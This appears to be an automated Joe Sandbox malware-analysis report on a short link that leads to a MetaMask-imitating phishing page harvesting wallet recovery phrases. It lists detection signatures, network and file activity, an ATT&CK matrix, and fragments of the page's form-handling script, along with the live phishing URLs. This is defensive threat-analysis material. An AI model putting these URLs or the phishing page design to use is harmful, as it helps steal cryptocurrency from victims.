Edit tour

Windows Analysis Report
https://trimmer.to:443/GWHMY

Overview

General Information

Sample URL:	https://trimmer.to:443/GWHMY
Analysis ID:	1558795
Infos:

Detection

HTMLPhisher

Score:	76
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

AI detected phishing page

Antivirus / Scanner detection for submitted sample

Yara detected HtmlPhish75

AI detected landing page (webpage, office document or email)

Found HTTP page in a blob

Javascript uses Telegram API

Creates files inside the system directory

Deletes files inside the Windows folder

Detected non-DNS traffic on DNS port

Drops PE files

Drops PE files to the windows directory (C:\Windows)

HTML body contains low number of good links

HTML page contains hidden javascript code

HTML title does not match URL

Javascript checks online IP of machine

Stores files to the Windows start menu directory

Classification

×

Process Tree

System is w10x64_ra

chrome.exe (PID: 7008 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

chrome.exe (PID: 6276 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2064 --field-trial-handle=1980,i,13232260748843774585,13079855381208036175,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

chrome.exe (PID: 5712 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://trimmer.to:443/GWHMY" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

cleanup

Yara Signatures

Dropped Files

Source	Rule	Description	Author	Strings
dropped/chromecache_181	JoeSecurity_HtmlPhish_75	Yara detected HtmlPhish_75	Joe Security

HTML

Source	Rule	Description	Author	Strings
0.0.id.script.csv	JoeSecurity_HtmlPhish_75	Yara detected HtmlPhish_75	Joe Security

Sigma Signatures

⊘No Sigma rule has matched

Suricata Signatures

⊘No Suricata rule has matched

Joe Sandbox Signatures

• AV Detection
• Phishing
• Compliance
• Software Vulnerabilities
• Networking
• System Summary
• Persistence and Installation Behavior
• Boot Survival

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: https://trimmer.to:443/GWHMY

Avira URL Cloud: detection malicious, Label: phishing

Phishing

AI detected phishing page

Source: blob:https://pub-2fce0e20a7d948f5a64c2108536eae75.r2.dev/f39a67bf-51ac-47be-b960-66a06bd98e56

Joe Sandbox AI: Score: 9 Reasons: The brand 'MetaMask' is known and associated with the domain 'metamask.io'., The URL provided is a blob URL, which is typically used for accessing resources in a browser and not for legitimate brand websites., The domain 'r2.dev' does not match the legitimate domain for MetaMask., The presence of a request for a 'Secret Recovery Phrase' is a common phishing tactic targeting cryptocurrency users., The URL structure and domain do not align with the known and legitimate domain for MetaMask. DOM: 2.1.pages.csv

Yara detected HtmlPhish75

Source: Yara match	File source: 0.0.id.script.csv, type: HTML
Source: Yara match	File source: dropped/chromecache_181, type: DROPPED

AI detected landing page (webpage, office document or email)

Source: blob:https://pub-2fce0e20a7d948f5a64c2108536eae75.r2.dev/f39a67bf-51ac-47be-b960-66a06bd98e56

Joe Sandbox AI: Page contains button: 'Confirm Secret Recovery Phrase' Source: '2.3.pages.csv'

Found HTTP page in a blob

Source: blob:https://pub-2fce0e20a7d948f5a64c2108536eae75.r2.dev/f39a67bf-51ac-47be-b960-66a06bd98e56

DOM page: Blob-based

Javascript uses Telegram API

Source: blob:https://pub-2fce0e20a7d948f5a64c2108536eae75.r2.dev/f39a67bf-51ac-47be-b960-66a06bd98e56

HTTP Parser: const wordselect = document.getelementbyid("word");const [wordform1, wordform2, wordform3, wordform4, wordform5] = document.queryselectorall(".form-main");const preloader = document.queryselector(".preloader");const count2 = document.queryselector(".count");const done = document.queryselector(".done-box");const nodone = document.queryselector(".no-done");const [word12_1, word12_2, word12_3, word12_4, word12_5, word12_6, word12_7, word12_8, word12_9, word12_10, word12_11, word12_12] = document.queryselectorall(".word-12");const word12input = document.queryselectorall(".word-12");const [btncofirm1, btncofirm2, btncofirm3, btncofirm4, btncofirm5] = document.queryselectorall(".btn-cofirm");const [word15_1, word15_2, word15_3, word15_4, word15_5, word15_6, word15_7, word15_8, word15_9, word15_10, word15_11, word15_12, word15_13, word15_14, word15_15] = document.queryselectorall(".word-15");const word15input = document.queryselectorall(".word-15");const [word18_1, word18_2, word18_3, word18_4, wo...

Source: blob:https://pub-2fce0e20a7d948f5a64c2108536eae75.r2.dev/f39a67bf-51ac-47be-b960-66a06bd98e56

HTTP Parser: Number of links: 0

Source: https://pub-2fce0e20a7d948f5a64c2108536eae75.r2.dev/index.html

HTTP Parser: Base64 decoded: <!DOCTYPE html><html lang="en"><head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>MetaMask</title> <meta name="googlebot" content="noindex"> <meta name="googlebot-news" content...

Source: blob:https://pub-2fce0e20a7d948f5a64c2108536eae75.r2.dev/f39a67bf-51ac-47be-b960-66a06bd98e56

HTTP Parser: Title: MetaMask does not match URL

Source: blob:https://pub-2fce0e20a7d948f5a64c2108536eae75.r2.dev/f39a67bf-51ac-47be-b960-66a06bd98e56

HTTP Parser: const wordselect = document.getelementbyid("word");const [wordform1, wordform2, wordform3, wordform4, wordform5] = document.queryselectorall(".form-main");const preloader = document.queryselector(".preloader");const count2 = document.queryselector(".count");const done = document.queryselector(".done-box");const nodone = document.queryselector(".no-done");const [word12_1, word12_2, word12_3, word12_4, word12_5, word12_6, word12_7, word12_8, word12_9, word12_10, word12_11, word12_12] = document.queryselectorall(".word-12");const word12input = document.queryselectorall(".word-12");const [btncofirm1, btncofirm2, btncofirm3, btncofirm4, btncofirm5] = document.queryselectorall(".btn-cofirm");const [word15_1, word15_2, word15_3, word15_4, word15_5, word15_6, word15_7, word15_8, word15_9, word15_10, word15_11, word15_12, word15_13, word15_14, word15_15] = document.queryselectorall(".word-15");const word15input = document.queryselectorall(".word-15");const [word18_1, word18_2, word18_3, word18_4, wo...

Source: blob:https://pub-2fce0e20a7d948f5a64c2108536eae75.r2.dev/f39a67bf-51ac-47be-b960-66a06bd98e56

HTTP Parser: <input type="password" .../> found

Source: blob:https://pub-2fce0e20a7d948f5a64c2108536eae75.r2.dev/f39a67bf-51ac-47be-b960-66a06bd98e56	HTTP Parser: No <meta name="author".. found
Source: blob:https://pub-2fce0e20a7d948f5a64c2108536eae75.r2.dev/f39a67bf-51ac-47be-b960-66a06bd98e56	HTTP Parser: No <meta name="author".. found
Source: blob:https://pub-2fce0e20a7d948f5a64c2108536eae75.r2.dev/f39a67bf-51ac-47be-b960-66a06bd98e56	HTTP Parser: No <meta name="author".. found

Source: blob:https://pub-2fce0e20a7d948f5a64c2108536eae75.r2.dev/f39a67bf-51ac-47be-b960-66a06bd98e56	HTTP Parser: No <meta name="copyright".. found
Source: blob:https://pub-2fce0e20a7d948f5a64c2108536eae75.r2.dev/f39a67bf-51ac-47be-b960-66a06bd98e56	HTTP Parser: No <meta name="copyright".. found
Source: blob:https://pub-2fce0e20a7d948f5a64c2108536eae75.r2.dev/f39a67bf-51ac-47be-b960-66a06bd98e56	HTTP Parser: No <meta name="copyright".. found

Source: unknown	HTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.16:49703 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.16:49707 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 20.109.210.53:443 -> 192.168.2.16:49718 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 20.109.210.53:443 -> 192.168.2.16:49752 version: TLS 1.2

Source: chrome.exe

Memory has grown: Private usage: 1MB later: 26MB

Source: global traffic	TCP traffic: 192.168.2.16:52823 -> 1.1.1.1:53
Source: global traffic	TCP traffic: 192.168.2.16:52823 -> 1.1.1.1:53
Source: global traffic	TCP traffic: 192.168.2.16:52823 -> 1.1.1.1:53
Source: global traffic	TCP traffic: 192.168.2.16:52823 -> 1.1.1.1:53
Source: global traffic	TCP traffic: 192.168.2.16:52823 -> 1.1.1.1:53
Source: global traffic	TCP traffic: 192.168.2.16:52823 -> 1.1.1.1:53
Source: global traffic	TCP traffic: 192.168.2.16:52823 -> 1.1.1.1:53

Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 20.189.173.10
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 20.189.173.10
Source: unknown	TCP traffic detected without corresponding DNS query: 20.189.173.10
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 20.189.173.10
Source: unknown	TCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknown	TCP traffic detected without corresponding DNS query: 20.189.173.10
Source: unknown	TCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknown	TCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknown	TCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknown	TCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknown	TCP traffic detected without corresponding DNS query: 20.189.173.10
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknown	TCP traffic detected without corresponding DNS query: 20.189.173.10
Source: unknown	TCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	DNS traffic detected: DNS query: trimmer.to
Source: global traffic	DNS traffic detected: DNS query: pub-2fce0e20a7d948f5a64c2108536eae75.r2.dev
Source: global traffic	DNS traffic detected: DNS query: www.google.com
Source: global traffic	DNS traffic detected: DNS query: code.jquery.com
Source: global traffic	DNS traffic detected: DNS query: cdnjs.cloudflare.com
Source: global traffic	DNS traffic detected: DNS query: i.ibb.co
Source: global traffic	DNS traffic detected: DNS query: ipinfo.io

Source: unknown	Network traffic detected: HTTP traffic on port 49733 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49744
Source: unknown	Network traffic detected: HTTP traffic on port 49710 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49743
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49742
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 52833
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49741
Source: unknown	Network traffic detected: HTTP traffic on port 49743 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49746 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49720 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49713 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49739
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49738
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49737
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49734
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49733
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49732
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49731
Source: unknown	Network traffic detected: HTTP traffic on port 49707 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49730
Source: unknown	Network traffic detected: HTTP traffic on port 49732 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49711 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49703 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49724 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49742 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49728 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49721 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49752 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49728
Source: unknown	Network traffic detected: HTTP traffic on port 49714 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49726
Source: unknown	Network traffic detected: HTTP traffic on port 49718 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49725
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49724
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49723
Source: unknown	Network traffic detected: HTTP traffic on port 49739 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49722
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49721
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49720
Source: unknown	Network traffic detected: HTTP traffic on port 49731 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49712 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49678 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49725 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49741 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49745 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49719 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49722 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49719
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49718
Source: unknown	Network traffic detected: HTTP traffic on port 49715 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49716
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49715
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49714
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49713
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49712
Source: unknown	Network traffic detected: HTTP traffic on port 49738 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49711
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49710
Source: unknown	Network traffic detected: HTTP traffic on port 49709 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49734 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49673 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49752
Source: unknown	Network traffic detected: HTTP traffic on port 49730 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49750
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 52826
Source: unknown	Network traffic detected: HTTP traffic on port 49726 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 52826 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49747 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49744 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 52833 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49709
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49707
Source: unknown	Network traffic detected: HTTP traffic on port 49716 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49750 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49703
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49747
Source: unknown	Network traffic detected: HTTP traffic on port 49737 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49746
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49745

Source: unknown	HTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.16:49703 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.16:49707 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 20.109.210.53:443 -> 192.168.2.16:49718 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 20.109.210.53:443 -> 192.168.2.16:49752 version: TLS 1.2

Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping7008_273201143
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping7008_273201143\sets.json
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping7008_273201143\manifest.json
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping7008_273201143\LICENSE
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping7008_273201143\_metadata\
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping7008_273201143\_metadata\verified_contents.json
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping7008_273201143\manifest.fingerprint
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping7008_1782038021
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping7008_1782038021\Google.Widevine.CDM.dll
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping7008_1782038021\manifest.json
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping7008_1782038021\_metadata\
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping7008_1782038021\_metadata\verified_contents.json
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping7008_1782038021\manifest.fingerprint
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping7008_436423739
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping7008_436423739\keys.json
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping7008_436423739\manifest.json
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping7008_436423739\LICENSE
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping7008_436423739\_metadata\
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping7008_436423739\_metadata\verified_contents.json
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping7008_436423739\manifest.fingerprint
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping7008_315739189
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping7008_315739189\ssl_error_assistant.pb
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping7008_315739189\manifest.json
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping7008_315739189\_metadata\
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping7008_315739189\_metadata\verified_contents.json
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping7008_315739189\manifest.fingerprint
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping7008_975696619
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping7008_975696619\manifest.json
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping7008_975696619\_metadata\
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping7008_975696619\_metadata\verified_contents.json
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping7008_975696619\manifest.fingerprint

Source: C:\Program Files\Google\Chrome\Application\chrome.exe

File deleted: C:\Windows\SystemTemp\chrome_BITS_7008_1564144717

Source: classification engine

Classification label: mal76.phis.win@28/44@22/242

Source: C:\Program Files\Google\Chrome\Application\chrome.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps

Source: unknown	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2064 --field-trial-handle=1980,i,13232260748843774585,13079855381208036175,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2064 --field-trial-handle=1980,i,13232260748843774585,13079855381208036175,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: unknown	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://trimmer.to:443/GWHMY"
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Program Files\Google\Chrome\Application\chrome.exe

File created: C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping7008_1782038021\Google.Widevine.CDM.dll

Jump to dropped file

Source: C:\Program Files\Google\Chrome\Application\chrome.exe

File created: C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping7008_1782038021\Google.Widevine.CDM.dll

Jump to dropped file

Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	Windows Management Instrumentation	1 Browser Extensions	1 Process Injection	21 Masquerading	OS Credential Dumping	System Service Discovery	Remote Services	Data from Local System	2 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	1 Registry Run Keys / Startup Folder	1 Registry Run Keys / Startup Folder	1 Process Injection	LSASS Memory	Application Window Discovery	Remote Desktop Protocol	Data from Removable Media	1 Non-Application Layer Protocol	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	1 Extra Window Memory Injection	1 File Deletion	Security Account Manager	Query Registry	SMB/Windows Admin Shares	Data from Network Shared Drive	2 Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	1 Extra Window Memory Injection	NTDS	System Network Configuration Discovery	Distributed Component Object Model	Input Capture	Protocol Impersonation	Traffic Duplication	Data Destruction

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
https://trimmer.to:443/GWHMY	100%	Avira URL Cloud	phishing

Dropped Files

Source	Detection	Scanner	Label	Link
